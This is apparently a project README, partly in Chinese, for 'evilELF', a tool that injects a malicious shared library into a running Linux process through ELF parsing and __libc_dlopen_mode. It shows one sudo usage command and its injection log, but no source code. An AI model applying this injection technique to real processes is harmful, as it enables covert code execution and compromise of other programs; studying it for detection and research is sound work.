Home

Awesome

evilELF

Malicious use of ELF such as .so inject, func hook and so on.

InejctRuntimeELF

具体参考 linux进程动态so注入 实现恶意 so 注入, 采用直接解析 ELF 文件的方式, 更加具有通用性, 并以 .gnu.hash 进行符号查找, 适用于目前的 ELF 结构.

代码规范, 参考 glibc-2.19, 用 ElfW 宏进行 3264 字长兼容.

Demo & Usage

➜  InjectRuntimeELF git:(master) ✗ sudo ./inject 3631 /evilELF/InjectRuntimeELF/example/evil.so
--------------------------------------------------------------
InjectRuntimeELF - (1.0.0) - by jmpews@gmail.com
--------------------------------------------------------------
[*] attached to pid 3631.
[*] dump runtime infomation
[*] dumping header...
[*] start symbol search '__libc_dlopen_mode'...
[*] start search libaray: /lib/i386-linux-gnu/libc.so.6
[*] start bucket search...
[*] found '__libc_dlopen_mode' at 0xb7693ae0
[+] entry point: 0x8048380
[+] stopped 3631 at eip:0xb7729428, esp:0xbf93cffc
[+] inject code done 3631 at eip:0x8048396
[*] start symbol search 'evilfunc'...
[*] start search libaray: /lib/i386-linux-gnu/libc.so.6
[*] start search libaray: /lib/ld-linux.so.2
[*] search in ld, no link_map.
[*] start search libaray: /evilELF/InjectRuntimeELF/example/evil.so
[*] start bucket search...
[*] found 'evilfunc' at 0xb772353b
[*] lib injection done!